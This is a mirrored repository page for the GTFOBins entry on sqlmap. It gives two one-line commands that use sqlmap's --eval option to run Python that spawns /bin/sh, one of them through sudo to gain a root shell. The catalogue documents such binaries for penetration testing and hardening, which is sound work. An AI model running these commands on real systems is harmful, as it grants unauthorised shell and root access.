1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-07 20:50:38 +02:00
GTFOBins.github.io/_gtfobins/sqlmap.md
Justin Applegate 57114a423c
Add sqlmap
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
2023-02-11 19:26:14 +01:00

286 B

description functions
This allows to execute [`python`](/gtfobins/python/) code, other functions may apply.
shell sudo
code
sqlmap -u 127.0.0.1 --eval="import os; os.system('/bin/sh')"
code
sudo sqlmap -u 127.0.0.1 --eval="import os; os.system('/bin/sh')"